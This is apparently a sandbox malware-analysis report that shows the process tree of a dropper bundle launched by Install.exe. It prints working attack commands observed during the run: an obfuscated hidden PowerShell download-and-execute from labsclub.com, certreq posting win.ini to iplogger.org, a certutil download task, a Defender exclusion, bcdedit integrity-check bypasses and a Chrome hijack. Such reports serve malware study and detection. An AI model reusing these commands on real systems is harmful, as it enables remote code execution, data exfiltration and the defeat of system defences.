description pid Process procid_target PID 628 wrote to memory of 3996 628 Install.exe 74 PID 628 wrote to memory of 3996 628 Install.exe 74 PID 3996 wrote to memory of 2388 3996 multitimer.exe 79 PID 3996 wrote to memory of 2388 3996 multitimer.exe 79 PID 2388 wrote to memory of 1308 2388 multitimer.exe 80 PID 2388 wrote to memory of 1308 2388 multitimer.exe 80 PID 1308 wrote to memory of 3900 1308 multitimer.exe 81 PID 1308 wrote to memory of 3900 1308 multitimer.exe 81 PID 1308 wrote to memory of 3984 1308 multitimer.exe 82 PID 1308 wrote to memory of 3984 1308 multitimer.exe 82 PID 1308 wrote to memory of 3984 1308 multitimer.exe 82 PID 1308 wrote to memory of 3924 1308 multitimer.exe 87 PID 1308 wrote to memory of 3924 1308 multitimer.exe 87 PID 1308 wrote to memory of 3924 1308 multitimer.exe 87 PID 1308 wrote to memory of 768 1308 multitimer.exe 83 PID 1308 wrote to memory of 768 1308 multitimer.exe 83 PID 1308 wrote to memory of 768 1308 multitimer.exe 83 PID 1308 wrote to memory of 3572 1308 multitimer.exe 85 PID 1308 wrote to memory of 3572 1308 multitimer.exe 85 PID 1308 wrote to memory of 3572 1308 multitimer.exe 85 PID 1308 wrote to memory of 1804 1308 multitimer.exe 84 PID 1308 wrote to memory of 1804 1308 multitimer.exe 84 PID 1308 wrote to memory of 3864 1308 multitimer.exe 86 PID 1308 wrote to memory of 3864 1308 multitimer.exe 86 PID 1308 wrote to memory of 3864 1308 multitimer.exe 86 PID 3984 wrote to memory of 904 3984 ijo4lxccox0.exe 116 PID 3984 wrote to memory of 904 3984 ijo4lxccox0.exe 116 PID 3984 wrote to memory of 904 3984 ijo4lxccox0.exe 116 PID 1308 wrote to memory of 3160 1308 multitimer.exe 115 PID 1308 wrote to memory of 3160 1308 multitimer.exe 115 PID 1308 wrote to memory of 3160 1308 multitimer.exe 115 PID 1308 wrote to memory of 1020 1308 multitimer.exe 88 PID 1308 wrote to memory of 1020 1308 multitimer.exe 88 PID 1308 wrote to memory of 1020 1308 multitimer.exe 88 PID 1308 wrote to memory of 3996 1308 multitimer.exe 114 PID 1308 wrote to memory of 3996 1308 multitimer.exe 114 PID 1308 wrote to memory of 3996 1308 multitimer.exe 114 PID 3572 wrote to memory of 3728 3572 IBInstaller_97039.exe 96 PID 3572 wrote to memory of 3728 3572 IBInstaller_97039.exe 96 PID 3572 wrote to memory of 3728 3572 IBInstaller_97039.exe 96 PID 3864 wrote to memory of 2200 3864 vict.exe 97 PID 3864 wrote to memory of 2200 3864 vict.exe 97 PID 3864 wrote to memory of 2200 3864 vict.exe 97 PID 3160 wrote to memory of 1320 3160 chashepro3.exe 95 PID 3160 wrote to memory of 1320 3160 chashepro3.exe 95 PID 3160 wrote to memory of 1320 3160 chashepro3.exe 95 PID 3996 wrote to memory of 1836 3996 vpn.exe 94 PID 3996 wrote to memory of 1836 3996 vpn.exe 94 PID 3996 wrote to memory of 1836 3996 vpn.exe 94 PID 1320 wrote to memory of 3784 1320 chashepro3.tmp 89 PID 1320 wrote to memory of 3784 1320 chashepro3.tmp 89 PID 1320 wrote to memory of 3784 1320 chashepro3.tmp 89 PID 1320 wrote to memory of 716 1320 chashepro3.tmp 90 PID 1320 wrote to memory of 716 1320 chashepro3.tmp 90 PID 1320 wrote to memory of 716 1320 chashepro3.tmp 90 PID 1320 wrote to memory of 1252 1320 chashepro3.tmp 92 PID 1320 wrote to memory of 1252 1320 chashepro3.tmp 92 PID 1320 wrote to memory of 1252 1320 chashepro3.tmp 92 PID 1320 wrote to memory of 1800 1320 chashepro3.tmp 98 PID 1320 wrote to memory of 1800 1320 chashepro3.tmp 98 PID 1320 wrote to memory of 1800 1320 chashepro3.tmp 98 PID 1320 wrote to memory of 4144 1320 chashepro3.tmp 100 PID 1320 wrote to memory of 4144 1320 chashepro3.tmp 100 PID 1320 wrote to memory of 4144 1320 chashepro3.tmp 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628 -
C:\Users\Admin\AppData\Local\Temp\WQI2F1R5L1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WQI2F1R5L1\multitimer.exe" 0 3060197d33d91c80.94013368 0 1012⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Users\Admin\AppData\Local\Temp\WQI2F1R5L1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WQI2F1R5L1\multitimer.exe" 1 3.1615014594.60432ac288aad 1013⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Users\Admin\AppData\Local\Temp\WQI2F1R5L1\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\WQI2F1R5L1\multitimer.exe" 2 3.1615014594.60432ac288aad4⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\aze1i0qqpen\imzg30qbxmn.exe"C:\Users\Admin\AppData\Local\Temp\aze1i0qqpen\imzg30qbxmn.exe" testparams5⤵
- Executes dropped EXE
PID:3900 -
C:\Users\Admin\AppData\Roaming\1og12ld2j1r\a23fsfzhsrm.exe"C:\Users\Admin\AppData\Roaming\1og12ld2j1r\a23fsfzhsrm.exe" /VERYSILENT /p=testparams6⤵
- Executes dropped EXE
PID:4952 -
C:\Users\Admin\AppData\Local\Temp\is-1KE2R.tmp\a23fsfzhsrm.tmp"C:\Users\Admin\AppData\Local\Temp\is-1KE2R.tmp\a23fsfzhsrm.tmp" /SL5="$A0054,404973,58368,C:\Users\Admin\AppData\Roaming\1og12ld2j1r\a23fsfzhsrm.exe" /VERYSILENT /p=testparams7⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:4800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\mgmvl2wwtjj\ijo4lxccox0.exe"C:\Users\Admin\AppData\Local\Temp\mgmvl2wwtjj\ijo4lxccox0.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Users\Admin\AppData\Local\Temp\is-FSDUO.tmp\ijo4lxccox0.tmp"C:\Users\Admin\AppData\Local\Temp\is-FSDUO.tmp\ijo4lxccox0.tmp" /SL5="$8007C,870426,780800,C:\Users\Admin\AppData\Local\Temp\mgmvl2wwtjj\ijo4lxccox0.exe" /VERYSILENT6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:904 -
C:\Users\Admin\AppData\Local\Temp\is-617AE.tmp\winlthst.exe"C:\Users\Admin\AppData\Local\Temp\is-617AE.tmp\winlthst.exe" test1 test17⤵
- Executes dropped EXE
PID:4748 -
C:\Users\Admin\AppData\Local\Temp\E4foItOR9.exe"C:\Users\Admin\AppData\Local\Temp\E4foItOR9.exe"8⤵PID:4352
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im E4foItOR9.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\E4foItOR9.exe" & del C:\ProgramData\*.dll & exit9⤵PID:4188
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im E4foItOR9.exe /f10⤵
- Kills process with taskkill
PID:3988
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
PID:5908
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"8⤵PID:5448
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"9⤵PID:6768
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cm1fq0cedbe\safebits.exe"C:\Users\Admin\AppData\Local\Temp\cm1fq0cedbe\safebits.exe" /S /pubid=1 /subid=4515⤵
- Executes dropped EXE
PID:768
-
-
C:\Users\Admin\AppData\Local\Temp\0gpspd3gerd\1qo2idpgnzy.exe"C:\Users\Admin\AppData\Local\Temp\0gpspd3gerd\1qo2idpgnzy.exe" 57a764d042bf85⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1804 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\PYNMEWDKAA\PYNMEWDKA.exe" 57a764d042bf8 & exit6⤵PID:3576
-
C:\Program Files\PYNMEWDKAA\PYNMEWDKA.exe"C:\Program Files\PYNMEWDKAA\PYNMEWDKA.exe" 57a764d042bf87⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dryyyjtn4qc\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\dryyyjtn4qc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Users\Admin\AppData\Local\Temp\is-ONRV3.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-ONRV3.tmp\IBInstaller_97039.tmp" /SL5="$4006C,14452723,721408,C:\Users\Admin\AppData\Local\Temp\dryyyjtn4qc\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\is-KO6T4.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-KO6T4.tmp\{app}\chrome_proxy.exe"7⤵
- Executes dropped EXE
PID:4588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-KO6T4.tmp\{app}\chrome_proxy.exe"8⤵PID:3944
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 49⤵
- Runs ping.exe
PID:4528
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970397⤵PID:4540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\dseagzgwqil\vict.exe"C:\Users\Admin\AppData\Local\Temp\dseagzgwqil\vict.exe" /VERYSILENT /id=5355⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3864 -
C:\Users\Admin\AppData\Local\Temp\is-DOPLT.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-DOPLT.tmp\vict.tmp" /SL5="$201D0,870426,780800,C:\Users\Admin\AppData\Local\Temp\dseagzgwqil\vict.exe" /VERYSILENT /id=5356⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2200 -
C:\Users\Admin\AppData\Local\Temp\is-3G8EV.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-3G8EV.tmp\wimapi.exe" 5357⤵
- Executes dropped EXE
PID:4968 -
C:\Users\Admin\AppData\Local\Temp\QO9tINX6D.exe"C:\Users\Admin\AppData\Local\Temp\QO9tINX6D.exe"8⤵PID:5360
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im QO9tINX6D.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\QO9tINX6D.exe" & del C:\ProgramData\*.dll & exit9⤵PID:4780
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im QO9tINX6D.exe /f10⤵
- Kills process with taskkill
PID:5232
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 610⤵
- Delays execution with timeout.exe
PID:5224
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"8⤵PID:6904
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"9⤵PID:6908
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ixra4uidvys\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ixra4uidvys\askinstall24.exe"5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3924 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:3296
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yh1zaysrvxt\poqqozccrhb.exe"C:\Users\Admin\AppData\Local\Temp\yh1zaysrvxt\poqqozccrhb.exe" /ustwo INSTALL5⤵
- Executes dropped EXE
PID:1020 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 6566⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 6726⤵
- Program crash
PID:488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 6326⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 7206⤵
- Program crash
PID:2992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 8846⤵
- Program crash
PID:3804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 9326⤵
- Program crash
PID:5504
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 10886⤵
- Program crash
PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\gkhxz30y4pn\app.exe"C:\Users\Admin\AppData\Local\Temp\gkhxz30y4pn\app.exe" /8-235⤵
- Executes dropped EXE
PID:4464 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Blue-Fire"6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Program Files (x86)\Blue-Fire\7za.exe"C:\Program Files (x86)\Blue-Fire\7za.exe" e -p154.61.71.13 winamp-plugins.7z6⤵PID:5776
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Blue-Fire\app.exe" -map "C:\Program Files (x86)\Blue-Fire\WinmonProcessMonitor.sys""6⤵PID:5212
-
C:\Program Files (x86)\Blue-Fire\app.exe"C:\Program Files (x86)\Blue-Fire\app.exe" -map "C:\Program Files (x86)\Blue-Fire\WinmonProcessMonitor.sys"7⤵PID:5532
-
-
-
C:\Program Files (x86)\Blue-Fire\7za.exe"C:\Program Files (x86)\Blue-Fire\7za.exe" e -p154.61.71.13 winamp.7z6⤵PID:1884
-
-
C:\Program Files (x86)\Blue-Fire\app.exe"C:\Program Files (x86)\Blue-Fire\app.exe" /8-236⤵PID:6028
-
C:\Program Files (x86)\Blue-Fire\app.exe"C:\Program Files (x86)\Blue-Fire\app.exe" /8-237⤵PID:4156
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"8⤵PID:6440
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes9⤵PID:6588
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe /8-238⤵PID:6188
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F9⤵
- Creates scheduled task(s)
PID:4288
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F9⤵
- Creates scheduled task(s)
PID:6972
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"9⤵PID:5460
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER10⤵
- Modifies boot configuration data using bcdedit
PID:6088
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:10⤵
- Modifies boot configuration data using bcdedit
PID:952
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:10⤵
- Modifies boot configuration data using bcdedit
PID:1356
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows10⤵
- Modifies boot configuration data using bcdedit
PID:4808
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe10⤵
- Modifies boot configuration data using bcdedit
PID:1216
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe10⤵
- Modifies boot configuration data using bcdedit
PID:5464
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 010⤵
- Modifies boot configuration data using bcdedit
PID:4544
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn10⤵
- Modifies boot configuration data using bcdedit
PID:4604
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 110⤵
- Modifies boot configuration data using bcdedit
PID:5772
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}10⤵
- Modifies boot configuration data using bcdedit
PID:6592
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast10⤵
- Modifies boot configuration data using bcdedit
PID:6104
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 010⤵
- Modifies boot configuration data using bcdedit
PID:2856
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}10⤵
- Modifies boot configuration data using bcdedit
PID:5600
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy10⤵
- Modifies boot configuration data using bcdedit
PID:5708
-
-
-
C:\Windows\System32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v9⤵
- Modifies boot configuration data using bcdedit
PID:5588
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe9⤵PID:1472
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\f4nespn0rtj\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\f4nespn0rtj\Setup3310.exe" /Verysilent /subid=5775⤵
- Executes dropped EXE
PID:4448
-
-
C:\Users\Admin\AppData\Local\Temp\hqci4n2rezb\vpn.exe"C:\Users\Admin\AppData\Local\Temp\hqci4n2rezb\vpn.exe" /silent /subid=4825⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3996
-
-
C:\Users\Admin\AppData\Local\Temp\dx1zhkdwszn\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\dx1zhkdwszn\chashepro3.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-J62OA.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-J62OA.tmp\vpn.tmp" /SL5="$10200,15170975,270336,C:\Users\Admin\AppData\Local\Temp\hqci4n2rezb\vpn.exe" /silent /subid=4823⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "4⤵PID:5268
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09015⤵PID:5420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "4⤵PID:5892
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09015⤵PID:6112
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall4⤵PID:4236
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install4⤵PID:4140
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:3784
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:4876
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"1⤵PID:716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
C:\Users\Admin\AppData\Local\Temp\is-NBBLA.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-NBBLA.tmp\chashepro3.tmp" /SL5="$301A6,2015144,58368,C:\Users\Admin\AppData\Local\Temp\dx1zhkdwszn\chashepro3.exe" /VERYSILENT1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"2⤵
- Executes dropped EXE
PID:1800
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"2⤵
- Executes dropped EXE
PID:4144 -
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"3⤵PID:5596
-
-
-
C:\Program Files (x86)\JCleaner\8.exe"C:\Program Files (x86)\JCleaner\8.exe"2⤵
- Executes dropped EXE
PID:4312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo grYNxrw3⤵PID:4444
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys3⤵PID:3408
-
C:\Windows\SysWOW64\cmd.execmd4⤵PID:1340
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"2⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:4252
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1EaGq7"2⤵PID:4212
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\22⤵PID:4168
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\23⤵PID:4912
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-1T6H1.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-1T6H1.tmp\Setup3310.tmp" /SL5="$20386,802346,56832,C:\Users\Admin\AppData\Local\Temp\f4nespn0rtj\Setup3310.exe" /Verysilent /subid=5771⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4668 -
C:\Users\Admin\AppData\Local\Temp\is-B123L.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-B123L.tmp\Setup.exe" /Verysilent2⤵PID:4936
-
C:\Users\Admin\AppData\Local\Temp\is-G42NM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-G42NM.tmp\Setup.tmp" /SL5="$20454,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-B123L.tmp\Setup.exe" /Verysilent3⤵PID:4660
-
C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\ProPlugin.exe" /Verysilent4⤵PID:5960
-
C:\Users\Admin\AppData\Local\Temp\is-9QNHB.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-9QNHB.tmp\ProPlugin.tmp" /SL5="$203C8,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-HKR85.tmp\ProPlugin.exe" /Verysilent5⤵PID:5988
-
C:\Users\Admin\AppData\Local\Temp\is-U5GEH.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-U5GEH.tmp\Setup.exe"6⤵PID:4840
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"7⤵PID:1172
-
C:\Windows\regedit.exeregedit /s chrome.reg8⤵
- Runs .reg file with regedit
PID:4604
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe8⤵
- Kills process with taskkill
PID:5016
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat8⤵PID:472
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)9⤵PID:5780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\chrome64.bat" h"10⤵PID:4184
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"11⤵PID:4592
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffe94b76e00,0x7ffe94b76e10,0x7ffe94b76e2012⤵PID:1216
-
-
